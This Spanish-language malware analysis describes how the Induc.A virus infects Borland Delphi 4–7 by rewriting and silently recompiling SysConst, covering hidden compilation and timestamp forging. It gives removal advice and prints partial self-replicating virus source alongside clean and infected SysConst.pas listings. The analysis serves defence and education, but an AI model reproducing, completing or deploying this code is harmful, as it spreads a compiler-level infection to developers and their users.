Realizamos un análisis forense a fondo sobre el virus Induc.A. Os comentamos el comportamiento del virus Induc.A que afecta e infecta al lenguaje de programación Borland Delphi 4, 5, 6 y 7, por lo que cualquier programa compilado con estas versiones de Delphi infectadas quedará infectado con el virus Induc.A. Mostramos el source code de este virus, así como su curioso método de propagación. Explicamos cómo eliminarlo de nuestro equipo y cómo evitar que vuelva a infectarse.
- El virus Induc.A.
- Cómo se propaga e infecta el equipo el virus Win32/Induc.A.
- Como eliminar o limpiar el virus Induc.A de un equipo infectado.
- Código fuente Source Code en Delphi añadido por el virus Induc.A a sysconst.dcu.
- Contenido del fichero SysConst.pas original de Delphi 6 (sin infectar).
El virus Induc.A
El virus Induc.A, conocido como W32/Induc-A es digno de mención sobre todo por su método de propagación, tal vez sea el primero (no es seguro) que utiliza este «novedoso» método de propagación. En realidad lo que hace es «infectar» el lenguaje de programación Borland Delphi, por lo que si somos desarrolladores de software y tenemos Delphi instalado, lo infectará para que todas las aplicaciones que desarrollemos con Delphi queden infectadas con Induc.A. Este virus, al menos la variante existente a fecha de hoy, 10 de agosto de 2010 no es dañino pues lo único que hace es infectar Delphi si lo tenemos instalado, sino no hará nada en el equipo.
Aunque no es dañino ni peligroso de cara al usuario final, el hecho de que el antivirus de los clientes o usuarios de nuestras aplicaciones detecte el virus en uno de nuestros ejecutables, afectará a la imagen de la empresa, por lo que sí es peligroso de cara a la conciencia social. Un usuario o cliente podría pensar que le estamos pasando una aplicación, por la que ha pagado, infectada con un virus, con las consecuencias negativas para nuestra empresa.
Hemos decidido realizar este artículo sobre el virus Induc.A porque es muy probable que se trate de una prueba o test de capacidad de infección, pues si funciona correctamente e infecta bastantes ejecutables a nivel mundial, posiblemente se convierta en una nueva forma de propagación de los virus, mediante lenguajes de programación y, muy posiblemente, serán usados en otros lenguajes de programación. Por supuesto, es muy probable también que empiecen a salir nuevas variantes más dañinas y peligrosas de cara al usuario que sí realicen acciones malintencionadas típicas del malware, spyware, virus y demás.
Cómo se propaga e infecta el equipo el virus Win32/Induc.A
Vamos a explicar a continuación el método de propagación e infección tan curioso y específico (sólo para desarrolladores de Borland Delphi del 4 al 7) de este virus. Una vez que ejecutemos una aplicación infectada con el virus Induc.A y no tengamos antivirus o bien no lo detecte correctamente, el virus se activará y realizará las siguientes acciones en nuestro equipo:
1. En primer lugar buscará si Borland Delphi está instalado en el equipo, en concreto buscará las versiones de Delphi de la 4 a la 7, para ello lee la clave del registro de configuraciones «Software\Borland\Delphi\«, si existe esta clave de registro, leerá el valor de cadena RootDir que contiene la carpeta de instalación de Delphi.
2. Editará el fichero sysconst.pas en la carpeta de instalación de Delphi obtenida anteriormente, en …Source\Rtl\Sys, y añadirá su código vírico. De esta forma el fichero sysconst.pas quedará infectado con el código del virus.
3. Hasta aquí no pasaría nada, pues si bien quedaría infectado el fichero sysconst.pas, no queda infectado el fichero compilado sysconst.dcu, que es el que usa Delphi y agrega a las aplicaciones compiladas.
4. El virus Induc.A hará una copia del fichero original sysconst.dcu llamándolo sysconst.bak.
5. Para que las aplicaciones compiladas con Delphi queden infectadas, el virus compilará el fichero sysconst.pas infectado para generar el fichero sysconst.dcu compilado e infectado.
6. De esta forma, cada vez que el desarrollador de software realice una aplicación, ésta quedará infectada con el virus.
7. Cuando el desarrollador publique la aplicación y el usuario la ejecute, si tiene Delphi instalado volverá a infectarlo y sino no hará ningún efecto. Aunque, como hemos dicho, si el usuario tiene un antivirus, lo normal es que detecte la aplicación como un virus llamado Win32/Induc.A.
Cómo funciona el virus Induc.A técnicamente
Aquí se puede ver el código fuente (source code) de este virus, a continuación explicamos paso a paso lo que va haciendo y las líneas de código más interesantes:
1. En primer lugar comprueba si existe el fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.bak
Si existe ya es porque, en teoría, el virus ya se ha ejecutado, por lo que no volverá a hacerlo. Para ello usa este código:
1 2 3 4 5 |
h := CreateFile(pchar(d + 'bak'), 0, 0, 0, 3, 0, 0); if h <> DWORD(-1) then begin CloseHandle(h); exit; end; |
Sería más lógico usar la función «FileExists», pero esta función requiere de la unidad «SysUtils», el desarrollador el virus debió considerar usar las menos unidades posibles, para no incrementar demasiado el fichero compilado ejecutable resultante.
2. A continuación cargará el siguiente fichero en memoria:
C:\Program Files (x86)\Borland\Delphi6\source\rtl\sys\SysConst.pas
Si no existe abortará la ejecución del código del virus, si existe continuará:
1 2 3 4 |
assignfile(f1, s); reset(f1); if ioresult <> 0 then exit; |
3. A continuación irá leyendo línea a línea el fichero anterior y copiando
cada línea en el nuevo fichero que creará en:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.pas
hasta llegar a «implementation» (incluida esta línea):
1 2 3 4 5 6 |
while not eof(f1) do begin readln(f1, s); writeln(f2, s); if pos('implementation', s) <> 0 then break; end; |
4. Ahora, haciendo uso del array de string declarado al principio, sc, añadirá al fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.pas
Los 24 elementos del array, correspondientes al código del virus en pascal:
1 2 3 4 5 |
for h := 1 to 1 do writeln(f2, sc[h]); for h := 1 to 23 do writeln(f2, '''' + sc[h], ''','); writeln(f2, '''' + sc[24] + ''');'); for h := 2 to 24 do writeln(f2, x(sc[h])); |
5. Cambiará el nombre al fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.dcu
Por
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.bak
Con la línea:
MoveFile(pchar(d + ‘dcu’), pchar(d + ‘bak’));
6. A continuación ejecuta un proceso oculto para compilar el fichero sysconst.pas modificado por el virus y generar el fichero sysconst.dcu infectado, que será el usado por todas las aplicaciones compiladas con Delphi. Para ello utiliza las siguientes líneas de código, ejecutando el compilador dcc32.exe que incluye Delphi en su carpeta «bin»:
1 2 3 4 5 6 7 |
fillchar(f, sizeof(f), 0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil, pchar(e + '"' + d + 'pas"'), 0, 0, false, 0, 0, 0, f, p); if b then WaitForSingleObject(p.hProcess, INFINITE); |
7. Ahora renombra el fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.bak
por
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.dcu
con la línea de código:
MoveFile(pchar(d + ‘bak’), pchar(d + ‘dcu’));
8. Elimina el fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.pas
con la línea de código:
DeleteFile(pchar(d + ‘pas’));
9. Obtiene ahora la fecha y hora de creación, modificación y último acceso al fichero:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.bak
Con la línea de código:
GetFileTime(h, @t1, @t2, @t3);
10. Por último, para que no haya sospechas por parte del usuario, cambia las fechas de creación, modificación y último acceso al fichero infectado:
C:\Program Files (x86)\Borland\Delphi6\Lib\sysconst.dcu
Por las obtenidas en el paso 9 del fichero sysconst.bak (anterior fichero sysconst.dcu antes de la infección), con la línea de código:
SetFileTime(h, @t1, @t2, @t3);
De esta forma, el virus queda en el fichero compilado sysconst.dcu y se propagará e infectará este fichero en todos los equipos donde se ejecute una aplicación compilada con el Delphi infectado. Por supuesto, como se ha explicado, este virus no produce ni realiza acciones malintencionadas, solamente se propaga en equipos con Delphi instalado.
Como se ha demostrado, no es un código excesivamente brillante, es fácil de entender y casi sencillo de desarrollar por cualquier usuario con conocimientos de programación medios-avanzados. Lo curioso, novedoso y a destacar de este virus (virus porque se propaga, pero no dañino) es su método de propagación: sencillo y muy eficaz, a la vez que difícil de detectar si no se conoce.
De hecho, la gran parte de los antivirus analizados para la detección y eliminación de este virus en nuestro laboratorio, NO eliminan el virus del fichero sysconst.dcu, sólo eliminan el virus de los ficheros compilados con Delphi e infectados de las aplicaciones desarrolladas, que ni siquiera eliminan el virus sino el fichero ejecutable completo. Pues este virus, al integrarse en el ejecutable completamente por el compilador de Delphi, no es posible eliminarlo sin que el ejecutable quede corrompido, por lo que la única solución para su desinfección es eliminar el fichero ejecutable compilado con el virus y volver a compilarlo con Delphi limpio de este virus.
Como eliminar o limpiar el virus Induc.A de un equipo infectado
Una vez explicado cómo funciona y cómo se propaga el virus Induc.A, eliminarlo manualmente de Delphi infectado es relativamente sencillo, existen varias posibilidades:
1. Eliminar todos los ficheros sysconst.pas y sysconst.pas de nuestro Delphi y crear únicamente el fichero sysconst.pas con el este contenido (original) o copiando y pegando este fichero de un Delphi no infectado. Crearemos este fichero sysconst.pas en la carpeta:
C:\Program Files (x86)\Borland\Delphi6\Lib
2. Volver a compilar todas nuestras aplicaciones desarrolladas con Delphi. Será el propio Delphi quien, en la primera compilación de la primera aplicación, compilará también el fichero sysconst.pas de la carpeta anterior, generando el sysconst.dcu limpio de virus.
3. Es importante analizar todo nuestro equipo con uno o varios antivirus, para evitar que nos haya quedado algún fichero ejecutable de alguna de nuestras aplicaciones sin volver a compilar tras la limpieza.
4. A partir de ahora, para evitar posibles infecciones de este virus o alguna variante más dañina, es recomendable tener un antivirus siempre actualizado y con el residente activo en memoria.
Código fuente Source Code en Delphi añadido por el virus Induc.A a sysconst.dcu
A continuación mostramos, sólo a título informativo (no debe usarse con otros fines) el código fuente o source code que añade el virus Induc.A al fichero sysconst.dcu de Delphi, al menos a fecha de hoy. En realidad el código en sí, como ya hemos dicho, no es dañino, pues lo único que hace es comprobar qué versión de Delphi tenemos instalada, modificar el fichero sysconst.pas añadiendo las líneas del array «sc» (el propio código del virus) y compilar sysconst.pas para generar sysconst.dcu ya infectado:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
uses windows; var sc: array[1..24] of string = ( 'uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]', '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', '?:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$+sc[h],$$,$);writeln(f2,$$+sc[24]+$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak |
Contenido del fichero SysConst.pas original de Delphi 6 (sin infectar)
El fichero original de Borland Delphi 6 «SysConst.pas«, ubicado en:
C:\Archivos de programa\Borland\Delphi6\Source\Rtl\Sys
Es el siguiente:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 |
{ *********************************************************************** } { } { Delphi / Kylix Cross-Platform Runtime Library } { } { Copyright (c) 1995, 2001 Borland Software Corporation } { } { *********************************************************************** } unit SysConst; interface resourcestring SUnknown = ''; SInvalidInteger = '''%s'' is not a valid integer value'; SInvalidFloat = '''%s'' is not a valid floating point value'; SInvalidCurrency = '''%s'' is not a valid currency value'; SInvalidDate = '''%s'' is not a valid date'; SInvalidTime = '''%s'' is not a valid time'; SInvalidDateTime = '''%s'' is not a valid date and time'; SInvalidDateTimeFloat = '''%g'' is not a valid date and time'; SInvalidTimeStamp = '''%d.%d'' is not a valid timestamp'; SInvalidGUID = '''%s'' is not a valid GUID value'; SInvalidBoolean = '''%s'' is not a valid boolean value'; STimeEncodeError = 'Invalid argument to time encode'; SDateEncodeError = 'Invalid argument to date encode'; SOutOfMemory = 'Out of memory'; SInOutError = 'I/O error %d'; SFileNotFound = 'File not found'; SInvalidFilename = 'Invalid filename'; STooManyOpenFiles = 'Too many open files'; SAccessDenied = 'File access denied'; SEndOfFile = 'Read beyond end of file'; SDiskFull = 'Disk full'; SInvalidInput = 'Invalid numeric input'; SDivByZero = 'Division by zero'; SRangeError = 'Range check error'; SIntOverflow = 'Integer overflow'; SInvalidOp = 'Invalid floating point operation'; SZeroDivide = 'Floating point division by zero'; SOverflow = 'Floating point overflow'; SUnderflow = 'Floating point underflow'; SInvalidPointer = 'Invalid pointer operation'; SInvalidCast = 'Invalid class typecast'; {$IFDEF MSWINDOWS} SAccessViolation = 'Access violation at address %p. %s of address %p'; {$ENDIF} {$IFDEF LINUX} SAccessViolation = 'Access violation at address %p, accessing address %p'; {$ENDIF} SStackOverflow = 'Stack overflow'; SControlC = 'Control-C hit'; SQuit = 'Quit key hit'; SPrivilege = 'Privileged instruction'; SOperationAborted = 'Operation aborted'; SException = 'Exception %s in module %s at %p.' + sLineBreak + '%s%s' + sLineBreak; SExceptTitle = 'Application Error'; {$IFDEF LINUX} SSigactionFailed = 'sigaction call failed'; {$ENDIF} SInvalidFormat = 'Format ''%s'' invalid or incompatible with argument'; SArgumentMissing = 'No argument for format ''%s'''; SDispatchError = 'Variant method calls not supported'; SReadAccess = 'Read'; SWriteAccess = 'Write'; SResultTooLong = 'Format result longer than 4096 characters'; SFormatTooLong = 'Format string too long'; SVarArrayCreate = 'Error creating variant array'; SVarArrayBounds = 'Variant array index out of bounds'; SVarArrayLocked = 'Variant array is locked'; SInvalidVarCast = 'Invalid variant type conversion'; SInvalidVarOp = 'Invalid variant operation'; SInvalidVarOpWithHResult = 'Invalid variant operation ($%.8x)'; SVarNotArray = 'Variant is not an array' deprecated; // use SVarInvalid SVarTypeUnknown = 'Unknown custom variant type (%.4x)' deprecated; // not used anymore SVarTypeOutOfRange = 'Custom variant type (%.4x) is out of range'; SVarTypeAlreadyUsed = 'Custom variant type (%.4x) already used by %s'; SVarTypeNotUsable = 'Custom variant type (%.4x) is not usable'; SVarTypeTooManyCustom = 'Too many custom variant types have been registered'; SVarTypeRangeCheck1 = 'Range check error for variant of type (%s)'; SVarTypeRangeCheck2 = 'Range check error while converting variant of type (%s) into type (%s)'; SInvalidVarNullOp = 'Invalid NULL variant operation'; SVarTypeCouldNotConvert = 'Could not convert variant of type (%s) into type (%s)'; SVarTypeConvertOverflow = 'Overflow while converting variant of type (%s) into type (%s)'; SVarOverflow = 'Variant overflow'; SVarInvalid = 'Invalid argument'; SVarBadType = 'Invalid variant type'; SVarNotImplemented = 'Operation not supported'; SVarOutOfMemory = 'Variant operation ran out memory'; SVarUnexpected = 'Unexpected variant error'; SVarDataClearRecursing = 'Recursion while doing a VarDataClear'; SVarDataCopyRecursing = 'Recursion while doing a VarDataCopy'; SVarDataCopyNoIndRecursing = 'Recursion while doing a VarDataCopyNoInd'; SVarDataInitRecursing = 'Recursion while doing a VarDataInit'; SVarDataCastToRecursing = 'Recursion while doing a VarDataCastTo'; SVarIsEmpty = 'Variant is empty'; sUnknownFromType = 'Cannot convert from the specified type'; sUnknownToType = 'Cannot convert to the specified type'; SExternalException = 'External exception %x'; SAssertionFailed = 'Assertion failed'; SIntfCastError = 'Interface not supported'; SSafecallException = 'Exception in safecall method'; SAssertError = '%s (%s, line %d)'; SAbstractError = 'Abstract Error'; SModuleAccessViolation = 'Access violation at address %p in module ''%s''. %s of address %p'; SCannotReadPackageInfo = 'Cannot access package information for package ''%s'''; sErrorLoadingPackage = 'Can''t load package %s.'+sLineBreak+'%s'; SInvalidPackageFile = 'Invalid package file ''%s'''; SInvalidPackageHandle = 'Invalid package handle'; SDuplicatePackageUnit = 'Cannot load package ''%s.'' It contains unit ''%s,''' + 'which is also contained in package ''%s'''; SOSError = 'System Error. Code: %d.'+sLineBreak+'%s'; SUnkOSError = 'A call to an OS function failed'; {$IFDEF MSWINDOWS} SWin32Error = 'Win32 Error. Code: %d.'#10'%s' deprecated; // use SOSError SUnkWin32Error = 'A Win32 API function failed' deprecated; // use SUnkOSError {$ENDIF} SNL = 'Application is not licensed to use this feature'; SConvIncompatibleTypes2 = 'Incompatible conversion types [%s, %s]'; SConvIncompatibleTypes3 = 'Incompatible conversion types [%s, %s, %s]'; SConvIncompatibleTypes4 = 'Incompatible conversion types [%s - %s, %s - %s]'; SConvUnknownType = 'Unknown conversion type %s'; SConvDuplicateType = 'Conversion type (%s) already registered'; SConvUnknownFamily = 'Unknown conversion family %s'; SConvDuplicateFamily = 'Conversion family (%s) already registered'; SConvUnknownDescription = '[%.8x]'; SConvIllegalType = 'Illegal type'; SConvIllegalFamily = 'Illegal family'; SConvFactorZero = '%s has a factor of zero'; SShortMonthNameJan = 'Jan'; SShortMonthNameFeb = 'Feb'; SShortMonthNameMar = 'Mar'; SShortMonthNameApr = 'Apr'; SShortMonthNameMay = 'May'; SShortMonthNameJun = 'Jun'; SShortMonthNameJul = 'Jul'; SShortMonthNameAug = 'Aug'; SShortMonthNameSep = 'Sep'; SShortMonthNameOct = 'Oct'; SShortMonthNameNov = 'Nov'; SShortMonthNameDec = 'Dec'; SLongMonthNameJan = 'January'; SLongMonthNameFeb = 'February'; SLongMonthNameMar = 'March'; SLongMonthNameApr = 'April'; SLongMonthNameMay = 'May'; SLongMonthNameJun = 'June'; SLongMonthNameJul = 'July'; SLongMonthNameAug = 'August'; SLongMonthNameSep = 'September'; SLongMonthNameOct = 'October'; SLongMonthNameNov = 'November'; SLongMonthNameDec = 'December'; SShortDayNameSun = 'Sun'; SShortDayNameMon = 'Mon'; SShortDayNameTue = 'Tue'; SShortDayNameWed = 'Wed'; SShortDayNameThu = 'Thu'; SShortDayNameFri = 'Fri'; SShortDayNameSat = 'Sat'; SLongDayNameSun = 'Sunday'; SLongDayNameMon = 'Monday'; SLongDayNameTue = 'Tuesday'; SLongDayNameWed = 'Wednesday'; SLongDayNameThu = 'Thursday'; SLongDayNameFri = 'Friday'; SLongDayNameSat = 'Saturday'; {$IFDEF LINUX} SEraEntries = ''; {$ENDIF} SCannotCreateDir = 'Unable to create directory'; implementation end. |
Contenido del fichero SysConst.pas infectado con Induc.A de Delphi 6
A continuación os mostramos cómo deja el virus Induc.A el fichero SysConst.pas una vez infectado, lo único que hace, con respecto al original, es añadir, a partir de «implementantion» (como se puede ver en el código fuente del virus) el siguiente código:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 |
{ *********************************************************************** } { } { Delphi / Kylix Cross-Platform Runtime Library } { } { Copyright (c) 1995, 2001 Borland Software Corporation } { } { *********************************************************************** } unit SysConst; interface resourcestring SUnknown = ''; SInvalidInteger = '''%s'' is not a valid integer value'; SInvalidFloat = '''%s'' is not a valid floating point value'; SInvalidCurrency = '''%s'' is not a valid currency value'; SInvalidDate = '''%s'' is not a valid date'; SInvalidTime = '''%s'' is not a valid time'; SInvalidDateTime = '''%s'' is not a valid date and time'; SInvalidDateTimeFloat = '''%g'' is not a valid date and time'; SInvalidTimeStamp = '''%d.%d'' is not a valid timestamp'; SInvalidGUID = '''%s'' is not a valid GUID value'; SInvalidBoolean = '''%s'' is not a valid boolean value'; STimeEncodeError = 'Invalid argument to time encode'; SDateEncodeError = 'Invalid argument to date encode'; SOutOfMemory = 'Out of memory'; SInOutError = 'I/O error %d'; SFileNotFound = 'File not found'; SInvalidFilename = 'Invalid filename'; STooManyOpenFiles = 'Too many open files'; SAccessDenied = 'File access denied'; SEndOfFile = 'Read beyond end of file'; SDiskFull = 'Disk full'; SInvalidInput = 'Invalid numeric input'; SDivByZero = 'Division by zero'; SRangeError = 'Range check error'; SIntOverflow = 'Integer overflow'; SInvalidOp = 'Invalid floating point operation'; SZeroDivide = 'Floating point division by zero'; SOverflow = 'Floating point overflow'; SUnderflow = 'Floating point underflow'; SInvalidPointer = 'Invalid pointer operation'; SInvalidCast = 'Invalid class typecast'; {$IFDEF MSWINDOWS} SAccessViolation = 'Access violation at address %p. %s of address %p'; {$ENDIF} {$IFDEF LINUX} SAccessViolation = 'Access violation at address %p, accessing address %p'; {$ENDIF} SStackOverflow = 'Stack overflow'; SControlC = 'Control-C hit'; SQuit = 'Quit key hit'; SPrivilege = 'Privileged instruction'; SOperationAborted = 'Operation aborted'; SException = 'Exception %s in module %s at %p.' + sLineBreak + '%s%s' + sLineBreak; SExceptTitle = 'Application Error'; {$IFDEF LINUX} SSigactionFailed = 'sigaction call failed'; {$ENDIF} SInvalidFormat = 'Format ''%s'' invalid or incompatible with argument'; SArgumentMissing = 'No argument for format ''%s'''; SDispatchError = 'Variant method calls not supported'; SReadAccess = 'Read'; SWriteAccess = 'Write'; SResultTooLong = 'Format result longer than 4096 characters'; SFormatTooLong = 'Format string too long'; SVarArrayCreate = 'Error creating variant array'; SVarArrayBounds = 'Variant array index out of bounds'; SVarArrayLocked = 'Variant array is locked'; SInvalidVarCast = 'Invalid variant type conversion'; SInvalidVarOp = 'Invalid variant operation'; SInvalidVarOpWithHResult = 'Invalid variant operation ($%.8x)'; SVarNotArray = 'Variant is not an array' deprecated; // use SVarInvalid SVarTypeUnknown = 'Unknown custom variant type (%.4x)' deprecated; // not used anymore SVarTypeOutOfRange = 'Custom variant type (%.4x) is out of range'; SVarTypeAlreadyUsed = 'Custom variant type (%.4x) already used by %s'; SVarTypeNotUsable = 'Custom variant type (%.4x) is not usable'; SVarTypeTooManyCustom = 'Too many custom variant types have been registered'; SVarTypeRangeCheck1 = 'Range check error for variant of type (%s)'; SVarTypeRangeCheck2 = 'Range check error while converting variant of type (%s) into type (%s)'; SInvalidVarNullOp = 'Invalid NULL variant operation'; SVarTypeCouldNotConvert = 'Could not convert variant of type (%s) into type (%s)'; SVarTypeConvertOverflow = 'Overflow while converting variant of type (%s) into type (%s)'; SVarOverflow = 'Variant overflow'; SVarInvalid = 'Invalid argument'; SVarBadType = 'Invalid variant type'; SVarNotImplemented = 'Operation not supported'; SVarOutOfMemory = 'Variant operation ran out memory'; SVarUnexpected = 'Unexpected variant error'; SVarDataClearRecursing = 'Recursion while doing a VarDataClear'; SVarDataCopyRecursing = 'Recursion while doing a VarDataCopy'; SVarDataCopyNoIndRecursing = 'Recursion while doing a VarDataCopyNoInd'; SVarDataInitRecursing = 'Recursion while doing a VarDataInit'; SVarDataCastToRecursing = 'Recursion while doing a VarDataCastTo'; SVarIsEmpty = 'Variant is empty'; sUnknownFromType = 'Cannot convert from the specified type'; sUnknownToType = 'Cannot convert to the specified type'; SExternalException = 'External exception %x'; SAssertionFailed = 'Assertion failed'; SIntfCastError = 'Interface not supported'; SSafecallException = 'Exception in safecall method'; SAssertError = '%s (%s, line %d)'; SAbstractError = 'Abstract Error'; SModuleAccessViolation = 'Access violation at address %p in module ''%s''. %s of address %p'; SCannotReadPackageInfo = 'Cannot access package information for package ''%s'''; sErrorLoadingPackage = 'Can''t load package %s.'+sLineBreak+'%s'; SInvalidPackageFile = 'Invalid package file ''%s'''; SInvalidPackageHandle = 'Invalid package handle'; SDuplicatePackageUnit = 'Cannot load package ''%s.'' It contains unit ''%s,''' + 'which is also contained in package ''%s'''; SOSError = 'System Error. Code: %d.'+sLineBreak+'%s'; SUnkOSError = 'A call to an OS function failed'; {$IFDEF MSWINDOWS} SWin32Error = 'Win32 Error. Code: %d.'#10'%s' deprecated; // use SOSError SUnkWin32Error = 'A Win32 API function failed' deprecated; // use SUnkOSError {$ENDIF} SNL = 'Application is not licensed to use this feature'; SConvIncompatibleTypes2 = 'Incompatible conversion types [%s, %s]'; SConvIncompatibleTypes3 = 'Incompatible conversion types [%s, %s, %s]'; SConvIncompatibleTypes4 = 'Incompatible conversion types [%s - %s, %s - %s]'; SConvUnknownType = 'Unknown conversion type %s'; SConvDuplicateType = 'Conversion type (%s) already registered'; SConvUnknownFamily = 'Unknown conversion family %s'; SConvDuplicateFamily = 'Conversion family (%s) already registered'; SConvUnknownDescription = '[%.8x]'; SConvIllegalType = 'Illegal type'; SConvIllegalFamily = 'Illegal family'; SConvFactorZero = '%s has a factor of zero'; SShortMonthNameJan = 'Jan'; SShortMonthNameFeb = 'Feb'; SShortMonthNameMar = 'Mar'; SShortMonthNameApr = 'Apr'; SShortMonthNameMay = 'May'; SShortMonthNameJun = 'Jun'; SShortMonthNameJul = 'Jul'; SShortMonthNameAug = 'Aug'; SShortMonthNameSep = 'Sep'; SShortMonthNameOct = 'Oct'; SShortMonthNameNov = 'Nov'; SShortMonthNameDec = 'Dec'; SLongMonthNameJan = 'January'; SLongMonthNameFeb = 'February'; SLongMonthNameMar = 'March'; SLongMonthNameApr = 'April'; SLongMonthNameMay = 'May'; SLongMonthNameJun = 'June'; SLongMonthNameJul = 'July'; SLongMonthNameAug = 'August'; SLongMonthNameSep = 'September'; SLongMonthNameOct = 'October'; SLongMonthNameNov = 'November'; SLongMonthNameDec = 'December'; SShortDayNameSun = 'Sun'; SShortDayNameMon = 'Mon'; SShortDayNameTue = 'Tue'; SShortDayNameWed = 'Wed'; SShortDayNameThu = 'Thu'; SShortDayNameFri = 'Fri'; SShortDayNameSat = 'Sat'; SLongDayNameSun = 'Sunday'; SLongDayNameMon = 'Monday'; SLongDayNameTue = 'Tuesday'; SLongDayNameWed = 'Wednesday'; SLongDayNameThu = 'Thursday'; SLongDayNameFri = 'Friday'; SLongDayNameSat = 'Saturday'; {$IFDEF LINUX} SEraEntries = ''; {$ENDIF} SCannotCreateDir = 'Unable to create directory'; implementation uses windows; var sc: array[1..24] of string = ( 'uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]', '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', '?:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$+sc[h],$$,$);writeln(f2,$$+sc[24]+$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak |